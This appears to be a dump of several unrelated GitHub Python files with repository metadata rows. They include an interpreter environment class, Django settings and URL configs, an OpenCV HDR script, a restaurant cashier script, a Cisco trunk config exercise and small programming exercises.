globalenv (GlobalEnv): a reference to the GlobalEnv.
Methods to implement:
__init__ Initializes a new instance of a LocalEnv.
Args:
prev (LocalEnv): initialize the variables and values lists, the previous environment is
initialized to the argument.
globalenv (GlobalEnv): initialize the reference to this GlobalEnv object.
lookup Looks up the variable passed to it and returns the associated value.
Args:
symbol (string): A string that is a variable (identifier) that is bound to some value in an environment.
Returns:
value: The value that is bound to the symbol passed in. This can be any object that is stored in the
values list associated with the symbol in a "rib" of the ribcage. If the value is not found in the local environment,
lookup tries the global environment.
extend Creates a new "rib" in a local environment. Passes itself and its global env reference to constructor.
Args:
variables (List): a list of variable identifiers.
values (List): a list of values that correspond to the identifiers in the variables list.
Returns:
LocalEnv: A new instance of a LocalEnv with "self" as the previous environment, and
globalenv as the reference to the global environment.
"""
def __init__(self, prev, globalenv=None, vars=None, vals=None):
if vals is None:
vals = []
if vars is None:
vars = []
self.prev = prev
if globalenv is None:
self.globalenv = GlobalEnv.empty_env()
else:
self.globalenv = globalenv
self.variables = vars
self.values = vals
def lookup(self, symbol):
self_lookup = lookup(self, symbol)
if self_lookup is not None:
return self_lookup
else:
return lookup(self.globalenv, symbol)
def extend(self, variables, values):
return LocalEnv(self, self.globalenv, variables, values)
def lookup(self, symbol):
for i in range(0, len(self.variables)):
if symbol == self.variables[i]:
return self.values[i]
if self.prev is None:
return None
else:
return self.prev.lookup(symbol)
if __name__ == '__main__':
g = GlobalEnv.empty_env()
g = g.extend(['a', 'b'], [1, 2])
print(g.lookup('a'))
l = g.extend(['x', 'y'], [3, 4])
print(l.lookup('a'))
print(l.lookup('b'))
print(l.lookup('x'))
print(l.lookup('y'))
| [
"jsundahl15@gmail.com"
] | jsundahl15@gmail.com |
045fbe74ec8accb45bf9ae2b6c91b56cd97f8a4a | 339809fbc9d3ac7e7073cdaa653d56e3ebca5dd4 | /221801412&221801405/venv/Lib/site-packages/sqlalchemy/dialects/mysql/mariadb.py | 07676f71d6ceaa37b30c5e84f7da7461683c5c75 | [] | no_license | siberia0015/PairProject | b384b62cf7d1f89a5727c7bbb21fe3d93d2881b2 | f99f3f7885b77acade28afd11652a5ed9591ccd6 | refs/heads/main | 2023-04-06T23:39:12.982810 | 2021-04-01T07:52:03 | 2021-04-01T07:52:03 | 349,049,089 | 0 | 51 | null | 2021-04-01T07:52:04 | 2021-03-18T11:33:40 | Python | UTF-8 | Python | false | false | 454 | py | from .base import MySQLDialect
class MariaDBDialect(MySQLDialect):
is_mariadb = True
name = "mariadb"
def loader(driver):
driver_mod = __import__(
"sqlalchemy.dialects.mysql.%s" % driver
).dialects.mysql
driver_cls = getattr(driver_mod, driver).dialect
return type(
"MariaDBDialect_%s" % driver,
(
MariaDBDialect,
driver_cls,
),
{},
)
| [
"1157928777@qq.com"
] | 1157928777@qq.com |
68a8f0693008a34bc7ee601bf743c19a920c3aa1 | 36803e5ce3921cfe62bfecc15b306f3139eadd87 | /exercises/06_control_structures/task_6_3.py | c4565860256758b0d5808babd55800efa4193c2c | [] | no_license | hasculdr/py_study_new | b4c0550554a45ab850ca0151235767f5876fd2e2 | e0f2ee78c55e41b2c957933177a318af9905290c | refs/heads/master | 2022-10-04T17:48:16.981516 | 2020-06-08T15:57:30 | 2020-06-08T15:57:30 | 270,659,031 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,313 | py | # -*- coding: utf-8 -*-
"""
Задание 6.3
В скрипте сделан генератор конфигурации для access-портов.
Сделать аналогичный генератор конфигурации для портов trunk.
В транках ситуация усложняется тем, что VLANов может быть много, и надо понимать,
что с ним делать.
Поэтому в соответствии каждому порту стоит список
и первый (нулевой) элемент списка указывает как воспринимать номера VLAN,
которые идут дальше.
Пример значения и соответствующей команды:
['add', '10', '20'] - команда switchport trunk allowed vlan add 10,20
['del', '17'] - команда switchport trunk allowed vlan remove 17
['only', '11', '30'] - команда switchport trunk allowed vlan 11,30
Задача для портов 0/1, 0/2, 0/4:
- сгенерировать конфигурацию на основе шаблона trunk_template
- с учетом ключевых слов add, del, only
Код не должен привязываться к конкретным номерам портов. То есть, если в словаре
trunk будут другие номера интерфейсов, код должен работать.
Ограничение: Все задания надо выполнять используя только пройденные темы.
"""
access_template = [
"switchport mode access",
"switchport access vlan",
"spanning-tree portfast",
"spanning-tree bpduguard enable",
]
trunk_template = [
"switchport trunk encapsulation dot1q",
"switchport mode trunk",
"switchport trunk allowed vlan",
]
access = {"0/12": "10", "0/14": "11", "0/16": "17", "0/17": "150"}
trunk = {"0/1": ["add", "10", "20"], "0/2": ["only", "11", "30"], "0/4": ["del", "17"]}
for intf, vlan in access.items():
print("interface FastEthernet" + intf)
for command in access_template:
if command.endswith("access vlan"):
print(" {} {}".format(command, vlan))
else:
print(" {}".format(command))
| [
"41771787+hasculdr@users.noreply.github.com"
] | 41771787+hasculdr@users.noreply.github.com |
0cd99b99051b2ca38f4d2447dd84e385852f0b0e | c1eea031212bdacd63983202577d9dc228b24ad9 | /aula139ate142-ecommerce-slug-automatico-e-cadastro-de-produtos/loja/urls.py | 57d599daab3e22fba74272c6d0e40262c3d7c21c | [
"MIT"
] | permissive | axellbrendow/python3-basic-to-advanced | 6677cef1390b4b3b089b45410df8755cb3c5a143 | fd8b1b325ed199f8bc770dc038752ea57cbbd926 | refs/heads/master | 2023-01-12T02:37:33.170469 | 2020-07-12T16:32:32 | 2020-07-12T16:32:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,172 | py | """loja URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# TODO: Remover debug toolbar
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
path('__debug__/', include(debug_toolbar.urls)),
# For django versions before 2.0:
# url(r'^__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
| [
"breno.axel@gmail.com"
] | breno.axel@gmail.com |
f218fe1f46c2c078c7f63ea04605b414e287a4dd | 158c21ea004d62c07949950a8516dc20d0f3127a | /kasir.py | 910957911d439809ca53de586cc0c5ccf3a9917e | [] | no_license | Rizky1408/Kasir-1 | c7b37e124ee37e9dfa61b932d2cd7410e209a609 | 1587979e8b377e06ccfc69f8d461046cda8cd2fb | refs/heads/main | 2023-03-26T05:26:41.486421 | 2021-03-20T14:22:52 | 2021-03-20T14:22:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,349 | py | pilihan = "x"
while pilihan == "x" :
print("=========================================================")
print("|\t\t\t SEBLAK SEHATI \t\t\t|")
print("|\t\t\t DAFTAR MENU \t\t\t|")
print("| \t1. Seblak Ceker \t\t10000 \t\t|")
print("| \t2. Seblak Sosis \t\t10000 \t\t|")
print("| \t3. Seblak Bakso \t\t10000 \t\t|")
print("| \t4. Seblak Seafood \t\t12000 \t\t|")
print("| \t5. Seblak Sosis+Bakso \t\t12000 \t\t|")
print("| \t6. Seblak Sosis+Bakso+Mie \t15000 \t\t|")
print("| \t7. Seblak Spesial \t\t15000 \t\t|")
print("| \t8. Seblak Komplit \t\t20000 \t\t|")
print("=========================================================")
print()
makanan = int(input("Mau Seblak Apa (Masukkan angka) = "))
print()
jumlah = int(input("Berapa porsi (Masukkan angka)? = "))
if makanan == 1:
harga = 10000*jumlah
elif makanan == 2:
harga = 10000*jumlah
elif makanan == 3 :
harga = 10000*jumlah
elif makanan == 4 :
harga = 12000*jumlah
elif makanan == 5 :
harga = 12000*jumlah
elif makanan == 6 :
harga = 15000*jumlah
elif makanan == 7 :
harga = 15000*jumlah
elif makanan == 8 :
harga = 20000*jumlah
print()
print("=========================================")
print("|\t\tDAFTAR MINUM\t\t|")
print("|\t1. Es Jeruk\t\t7000\t|")
print("|\t2. Es teh Manis\t\t5000\t|")
print("|\t3. Air Putih\t\t3000\t|")
print("|\t4. Teh Pucuk\t\t4000\t|")
print("|\t5. Tidak memesan minuman\t|")
print("=========================================")
minum = int(input("Mau minum apa? = "))
pcs = int(input("Berapa pcs? = "))
if minum == 1:
jeruk=7000*pcs
total= harga+jeruk
elif minum == 2:
esteh=5000*pcs
total= harga+esteh
elif minum == 3:
air=3000*pcs
total=harga+air
elif minum == 4:
pucuk=4000*pcs
total=harga+pucuk
elif minum == 5:
pass
#Menghitung total harga
if minum == 5:
print("Total Pembayaran = ",harga)
elif jumlah > 5:
diskon = total-3000
print("Total Pembayaran = ",diskon)
elif jumlah < 5:
print("Total Pembayaran = ",total)
break
| [
"noreply@github.com"
] | Rizky1408.noreply@github.com |
962dfa2d14312d478ac13e9db700d04210be2a66 | a64ed9b09efdeecc5139f27d644d04593ace0e50 | /cars/apps/migrations/0002_auto_20141104_1059.py | a5c4912c93941b10e723ae05c11fec8201aeec51 | [] | no_license | jeet15/Django-JSON | 0cdadbc0384c491e776d122716ba253baa6d9ff0 | 962f5404ae2f5877a35476250630352a71736e47 | refs/heads/master | 2016-09-05T23:37:17.378629 | 2014-11-21T12:24:49 | 2014-11-21T12:24:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('apps', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='car',
name='image',
field=models.FileField(upload_to=b'C:/project/sample/car/cars/media/pics/'),
preserve_default=True,
),
]
| [
"gurjeetsingh1506@gmail.com"
] | gurjeetsingh1506@gmail.com |
9350861b47687994cd410e6e244b97737bbc9948 | fe161a9f81cb2c0d1f281e05aad3cb768fc8f8b9 | /Chap8-CompuPhotograhpy/3-HDR/HDR.py | 11fdd9bfab202d7cb98cc54bf9f6d2f26e6f76e5 | [
"MIT"
] | permissive | wxzs5/LearnOpenCV | 234b4884dadb0fad4272815be9a93d8b186dc7cd | dee92d96af593d617d784700abab78c8d45cf74c | refs/heads/master | 2021-05-07T22:32:55.667232 | 2018-04-19T07:45:31 | 2018-04-19T07:45:31 | 107,265,611 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,463 | py | import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
# Loading exposure images into a list
img_fn = ["../../img/img0.png", "../../img/img1.png", "../../img/img2.png", "../../img/img3.png"]
img_list = [cv.imread(fn) for fn in img_fn]
exposure_times = np.array([15.0, 2.5, 0.25, 0.0333], dtype=np.float32)
merge_debvec = cv.createMergeDebevec()
hdr_debvec = merge_debvec.process(img_list, times=exposure_times.copy())
merge_robertson = cv.createMergeRobertson()
hdr_robertson = merge_robertson.process(img_list, times=exposure_times.copy())
# Tonemap HDR image
tonemap1 = cv.createTonemapDurand(gamma=2.2)
res_debvec = tonemap1.process(hdr_debvec.copy())
tonemap2 = cv.createTonemapDurand(gamma=1.3)
res_robertson = tonemap2.process(hdr_robertson.copy())
# Exposure fusion using Mertens
merge_mertens = cv.createMergeMertens()
res_mertens = merge_mertens.process(img_list)
# Convert datatype to 8-bit and save
res_debvec_8bit = np.clip(res_debvec*255, 0, 255).astype('uint8')
res_robertson_8bit = np.clip(res_robertson*255, 0, 255).astype('uint8')
res_mertens_8bit = np.clip(res_mertens*255, 0, 255).astype('uint8')
plt.subplot(1, 3, 1), plt.imshow(res_debvec_8bit)
plt.title('debvec'), plt.xticks([]), plt.yticks([])
plt.subplot(1, 3, 2), plt.imshow(res_robertson_8bit)
plt.title('robertson'), plt.xticks([]), plt.yticks([])
plt.subplot(1, 3, 3), plt.imshow(res_mertens_8bit)
plt.title('mertens'), plt.xticks([]), plt.yticks([])
plt.show() | [
"790230517@qq.com"
] | 790230517@qq.com |
bf68971a5d62dc3074b046a532f8dd092e7aefce | 5e07a10ba21cae5baad3b0eb93fcb08968bab68f | /swap_pairs.py | f7e8c427f7e80090ca12464aff4feb2087e0fe90 | [] | no_license | billstark/leetcode | 530b4b06e23d36d5b7816498ba049ea2ea2e1df3 | 35cadf6b0d4942c919696ef8d35acd5e7617b627 | refs/heads/master | 2020-04-15T04:39:15.517961 | 2019-01-14T15:44:26 | 2019-01-14T15:44:26 | 164,390,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def swapPairs(head):
if head == None:
return head
if head.next == None:
return head
current = head
nextHead = head.next
swapped = swapPairs(nextHead.next)
current.next = swapped
nextHead.next = current
return nextHead
head = ListNode(1)
a = ListNode(2)
b = ListNode(3)
c = ListNode(4)
head.next = a
a.next = b
b.next = c
import pdb; pdb.set_trace()
result = swapPairs(head)
import pdb; pdb.set_trace() | [
"billstark1996@gmail.com"
] | billstark1996@gmail.com |
6e47832275d2037408e61f2f79828326e1d75b7b | 6d5cd84339cb3e1d59915adf34531d5145a1ea51 | /14_a.py | f86e8c18a803f2bef7e894f9b409a3fd710872dc | [] | no_license | ChrisDoubleEwe/AdventOfCode2015 | 8ba915a9a799c86bdfca24bbe85172cbffd722c9 | a3d1ebc95474c2290f46ac4a7b5365d7d5b77074 | refs/heads/main | 2023-03-01T06:06:14.689768 | 2021-02-07T22:23:14 | 2021-02-07T22:23:14 | 334,727,758 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | import sys
from ctypes import *
import copy
import hashlib
import itertools
import re
from printf import printf
with open("14_input.txt") as f:
content = f.readlines()
data = []
deer = []
for c in content:
match = re.search('([a-zA-Z]*) can fly ([0-9]*) .* for ([0-9]*) seconds, but then must rest for ([0-9]*) seconds.', c)
if match:
deer.append(match.group(1))
d = []
d.append(match.group(1)) # 0 - Name
d.append(int(match.group(2))) # 1 - dist
d.append(int(match.group(3))) # 2 - fly time
d.append(int(match.group(4))) # 3 - rest time
d.append(1) # 4 - 1= flying ; 0 = rest
d.append(int(match.group(3))) # 5 - timer
d.append(0) # 6 - total dist
data.append(copy.deepcopy(d))
for sec in range(0, 2504):
for z in range(0, len(deer)):
i = data[z]
if i[4] == 1:
i[6] += i[1]
i[5] += -1
if i[5] == 0:
i[4] = 0
i[5] = i[3]
continue
else:
i[5] += -1
if i[5] == 0:
i[4] = 1
i[5] = i[2]
max = 0
max_p = []
for p in data:
if p[6] > max:
max = p[6]
max_p = p
print "Part A: " + str(max_p[6])
| [
"chris@offwhitehouse.co.uk"
] | chris@offwhitehouse.co.uk |
80a0fd2bfe61535c36a73a95861ea8fb3dc46571 | 6a6b1655fa5f0d3f095ca5e5527ac89285b1607e | /rosa-env/bin/django-admin.py | 3cfec5dcc1dc3441a45ff20d6dc9bf0ba5a392c2 | [] | no_license | BEEFF/DjangoTix | 137b25e86995edd1f4f5481253fea0be3acbee7b | acccc9693216584e83944b60e765c025772b922f | refs/heads/main | 2023-07-04T03:11:46.293414 | 2021-08-03T14:42:42 | 2021-08-03T14:42:42 | 392,349,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | #!/home/t/rosa/rosa-env/bin/python3
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"okeeffe_thomas@yahoo.co.uk"
] | okeeffe_thomas@yahoo.co.uk |
0a75f92da21ee8ae0552cbb4fffd23b6bc972c79 | f7525456f5451926282cba840dae1c4adba3573f | /STEPIK.py | f7376ff86ba6b0f3ae7a501f37f92df71bd0d3a7 | [
"MIT"
] | permissive | AlPus108/Python_lessons | 1f2ac6e1ce5a344e0c900249ef7864d257424436 | 0e96117d9a8b76fd651e137fc126ddedaa6accd9 | refs/heads/master | 2021-02-27T06:37:10.239125 | 2020-05-14T21:27:29 | 2020-05-14T21:27:29 | 245,588,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,605 | py | # ЭКРАНИРОВАНИЕ
# a = "строка с \" кавычкой двойной и \' одинарной"
# Чтобы в строке появился символ обратной косой черты
# a = "Строка с обратным слешем \\"
# Перенос строки
# a = "Первая строка \nВторая строка
'''
Сделать перенос строки в Питоне можно и другим способом — объявить строку с помощью тройных кавычек.
То есть вы как бы сразу расставляете переносы строк прямо в программе, записывая значение переменной на разных строках.
Со строками, объявленными с помощью одинарных кавычек, так сделать не получится.
a = """Первая строка
Вторая строка
Третья строка"""
Помните, что если строка начинается с трёх кавычек, то и заканчиваться она должна тремя такими же кавычками.
'''
# a = '''Первая строка
# Вторая строка
# Третья строка'''
# print(a)
# ------------------------------------------
'''
result = print('Что вернет функция print?')
print(result)
Первой строкой эта программа выведет текст "Что вернет функция print?", а второй — слово None.
Специально для обозначения «ничего» в Питоне есть отдельный тип данных NoneType.
Переменные этого типа могут иметь только одно значение — None. None — это «никакое» или «неопределенное» значение.
В программе выше переменная result как раз и будет иметь значение None. Это одно из ключевых слов языка и,
если вы хотите присвоить None переменной, его надо писать как есть, без кавычек:
z = None
'''
# ---------------------------------------------------
# КВАДРАТНЫЙ КОРЕНЬ ИЗ ЧИСЛА
# print(9 ** 0.5) # Возвведение числа в степень 0.5 дает квадратный корень этого числа
# ----------------------------------------------------
# фОРМАТ ЕСТЕСТВЕННЫХ ЧИСЕЛ - через е-1
# print(5e-1) # это то же самое, что и 0.5. Число пять умножается на 10 в степени -1
# print(5 * 10**-1) # запись идентичная первой
#
# print(1234e-2) # это то же самое выражение, что и
# print(1234 * 10**-2)
#
# # Также можно использовать положительную степень
# print(1234e2) # аналогично (1234 * 10**2)
# print(1234 * 10**2) # 10**2 - 10 в квадрате
# -------------------------------------------------------
# #Помните, что любые арифметические операции выше по приоритету операций сравнения и логических операторов.
# -------------------------------------------------------
# Площадь треугольника:
# S = √p(p - a)(p - b)(p - c), где p = (a + b + c) / 2
# где (a + b + c) / 2
# Площадь прямоугольника:
# S = a · b
# Площадь круга:
# S = π r2
# Вычисление площади фигур
# s = input()
# if s == "треугольник":
# a = float(input())
# b = float(input())
# c = float(input())
# p = (a + b + c) / 2
# print((p*((p-a)*(p-b)*(p-c)))**0.5) # Вычислене площади треугольника по формуле Герона
# elif s == "прямоугольник":
# a = float(input())
# b = float(input())
# print(a * b)
# elif s == "круг":
# r = float(input())
# print(3.14 * r**2)
# ----------------------------------------------------
# Склонение существительных
# x = int(input())
#
# if x % 10 == 1 and x % 100 != 11:
# print(x, 'программист')
# # elif x % 10 == 2 and x % 20 != 12 or x % 10 == 3 and x % 20 != 13 or x % 10 == 4 and x % 20 != 14:
# elif (x % 10 >= 2) and (x % 10 <= 4) and (x % 100 < 10 or x % 100 > 20):
# print(x, 'программиста')
# else:
# print(x, 'программистов')
# --------------------------------------------------
# Счастливый билет. Сумма первых трех цифр должна быть равна сумме последних трех
# x = int(input())
# n1 = x % 10
# x = x // 10
# n2 = x % 10
# x = x // 10
# n3 = x % 10
# x = x // 10
# n4 = x % 10
# x = x // 10
# n5 = x % 10
# x = x // 10
# n6 = x % 10
# if n1 + n2 + n3 == n4 + n5 + n6:
# print('Счастливый')
# else:
# print("Обычный")
# ------------------------------------------------
# Выводим треугольник из звездочек
# n = int(input())
# i = 1
# while i <= n:
# print('*' * i)
# i += 1
#
# stars = '*'
# while len(stars) <= n:
# print(stars)
# stars += '*'
# ----------------------------------------------
# Вычисляем сумму числе на задаваемом отрезке от а до b
# a = int(input())
# b = int(input())
# i = a
# while i != b:
# i += 1
# a += i
#
# print(a)
# ----------------------------------------
# Суммируем вводимые числа и, после первого нуля, подсчитываем сумму этих чисел
# n = 1
# i = 0
# while n != 0:
# n = int(input())
# i += n
# print(i)
# -----------------------------------------------------
# Ищем наименьшее общее кратное двух чисел
# a = int(input())
# b = int(input())
# i = 1
#
# while i % a != 0 or i % b != 0:
# i = i + 1
# print(i)
# --------------------------------------------------
# i = 0
#
# while i < 5:
# a, b = input("Введите два любых числа через пробел").split() # split() разделяет пары чисел по пробелу между ними
# a = int(a)
# b = int(b)
# if(a == 0) and (b == 0): # Если обе введенных цифры равны 0
# break # досрочно завершаем цикл
# if(a == 0) or (b == 0):
# continue # код ниже не выполняется и переходим к следующей итерации
# # (в том случае, если по условию она должна быть), вывод произведения чисел и приращивание i не происходит.
# То есть, эту пару чисел игнорируем
# print(a * b)
# i += 1
# ---------------------------------------------
# Напишите программу, которая считывает целые числа с консоли по одному числу в строке.
#
# Для каждого введённого числа проверить:
# если число меньше 10, то пропускаем это число;
# если число больше 100, то прекращаем считывать числа;
# в остальных случаях вывести это число обратно на консоль в отдельной строке.
# while True:
# n = int(input())
# if n < 10:
# continue
# if n > 100:
# break
# else:
# print(n)
# -------------------------------------------------
# Квадрат из звездочек в цикле for
# a = int(input())
# for i in range(a):
# print('*' * a)
# Двойной цикл
# n = int(input())
# for i in range(n):
# for j in range(n): # внутренний цикл выводит звездочку n-раз и создает строку
# print('*', end=' ') # end - указываем, что будем использовать в качестве разделителя.
# # Вданном случае "пробел". Если end отсутствует, будет обычный перевод на новую строку
# print() # этот print делает новую строку без вывода на экран
# -----------------------------------------------------------
# Таблица умножения
# Напишите программу, на вход которой даются четыре числа aa, bb, cc и dd, каждое в своей строке.
# Программа должна вывести фрагмент таблицы умножения для всех чисел отрезка [a; b]
# на все числа отрезка [c;d].
#
# Числа a, b, c и d являются натуральными и не превосходят 10, a <= b, c <= d.
#
# Следуйте формату вывода из примера, для разделения элементов внутри строки используйте '\t' — символ табуляции.
# Заметьте, что левым столбцом и верхней строкой выводятся сами числа из заданных отрезков
# — заголовочные столбец и строка таблицы.
# a = int(input())
# b = int(input())
# c = int(input())
# d = int(input())
#
# print()
# for x in range(c, d + 1):
# print('\t', x, end='')
# print()
# for i in range(a, b + 1):
# print(i, end='\t')
# for n in range(c, d + 1):
# if n < 10:
# print('', n * i, end='\t')
# else:
# print(n * i, end='\t')
# print()
# ------------------------------------------
# Вариант 1 Вывести сумму всех нечетных числел от a до b (включая границы)
# a, b = input().split() # получвем первое и последнее значения диапазона в одной строке через пробел
# a = int(a) # переводим значения в цифоровой формат
# b = int(b)
# x = 0
# for i in range(a, b+1): # циклом проходимся по множеству от a до b
# if i % 2 == 1: # если значение нечетное
# x += i # складываем значения
# print(x) # выводим сумму
#---------------------------------------------
# Вариант 2 Вывести сумму всех нечетных числел от a до b (включая границы)
# a, b = input().split() # получвем первое и последнее значения диапазона в одной строке через пробел
# a = int(a) # переводим значения в цифоровой формат
# b = int(b)
# x = 0
# if a % 2 == 0: # если первое число четное
# a = a + 1 # увеличиваем его на 1 (берем ближайшее к нему нечетное число)
# for i in range(a, b+1, 2): # циклом проходимся по множеству от a до b с шагом 2 (через 1) по нечетным числам
# x += i # складываем значения
# print(x) # выводим сумму
#---------------------------------------------
# Вариант 3 Вывести сумму всех нечетных числел от a до b (включая границы)
# Отличается от предыдущего вводом данных
# a, b = (int(i) for i in input().split()) # В такой ситуации, когда нам нужно к последовательности объектов
# # применить одну и ту же ф-ю, мы применяем специальную конструкцию,
# # которая называется list comprehensive (комплексный список).
# # В начале указываем, какую ф-ю мы применяем int(), которую применям для каждого элемента последовательности
# # Выражение, генерирующее эту последвательность, записывается справа input().split().
# # Для каждого объета этой последовательности через цикл применяем ф-ю int()
# # Такую последовательность удобно применять, когда несколько чисел выводятся в одной строке
# x = 0
# if a % 2 == 0: # если первое число четное
# a = a + 1 # увеличиваем его на 1 (берем ближайшее к нему нечетное число)
# for i in range(a, b+1, 2): # циклом проходимся по множеству от a до b с шагом 2 (через 1) по нечетным числам
# x += i # складываем значения
# print(x) # выводим сумму
#---------------------------------------------
'''
Напишите программу, которая считывает с клавиатуры два числа a и b,
считает и выводит на консоль среднее арифметическое всех чисел из отрезка [a; b], которые делятся на 3.
В приведенном ниже примере среднее арифметическое считается для чисел на отрезке [-5; 12].
Всего чисел, делящихся на 3, на этом отрезке 6: -3, 0, 3, 6, 9, 12. Их среднее арифметическое равно 4.5
На вход программе подаются интервалы, внутри которых всегда есть хотя бы одно число, которое делится на 3.
'''
# a, b = (int(i) for i in input().split())
# x = 0
# z = 0
# for i in range(a, b+1):
# if i % 3 == 0:
# x += i
# z += 1
# print(x / z)
#------------------------------------------
| [
"alex.pustovoy@gmail.com"
] | alex.pustovoy@gmail.com |
ab4b2af750e03de8a750d4170d8e27d4684868f2 | b858eb6e2a67f6c013e21a2a8a256a04775cc474 | /LittleStation/LittleStation/settings.py | 4f0ce9fee9c19c8e5823f9c78cb209f7e7b9abc5 | [] | no_license | windangle/xiaoyaoyu_test | 5bc72a50fcefdc8f0d8e19b647bff037d69673e0 | c53ee3e016ed8eea9782fc0173a4750604f83514 | refs/heads/master | 2020-04-14T07:49:52.882686 | 2019-06-22T15:49:23 | 2019-06-22T15:49:23 | 163,723,243 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,109 | py | """
Django settings for LittleStation project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '6-m)k@z$_k-&-kqgmad=5_llgvz6l*1*h6u=e1tqpimv^%fww+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'LittleStation.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'LittleStation.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"green8237@sina.com"
] | green8237@sina.com |
3919e6b7a51097e8a8afcb8aca30ec4219c26e37 | 6a3cfbab9671951edaaebdedb45b77aeaea69ce3 | /journal_ui.py | 0cd543e8750dac6d5afddeb42496253fbc7c1f9c | [] | no_license | dcook8080/it-python | 3aebc63b8100f05c44035f91dc829e8b9c0f355a | 10ac9047be356c23f0b3a988d8e75a27bbada43a | refs/heads/master | 2020-07-25T13:38:58.945590 | 2019-11-20T16:40:30 | 2019-11-20T16:40:30 | 208,309,766 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 902 | py | import journal
from banner import banner
banner("Journal", "Dylan Cook")
def main():
run_event_loop()
def run_event_loop():
filename = "default"
journal_data = journal.load(filename)#[]
while True:
command = input("[L]ist entries, [A]dd an entry, E[x]it: ")
if command.upper() == "L":
list_entries(journal_data)
elif command.upper() == "A":
add_entry(journal_data)
elif command.upper() == "X":
break
else:
print("Sorry, I don't understand")
journal.save(filename , journal_data)
def list_entries(data):
print("Your journal entries:")
entries = reversed(data)
for num, entry in enumerate(entries):
print(f"{num+1} - {entry}")
def add_entry(data):
entry = input("Type your entry, <ENTER> to exit: \n")
journal.add_entry(entry, data)
#data.append(entry) | [
"dylanjcook73@gmail.com"
] | dylanjcook73@gmail.com |
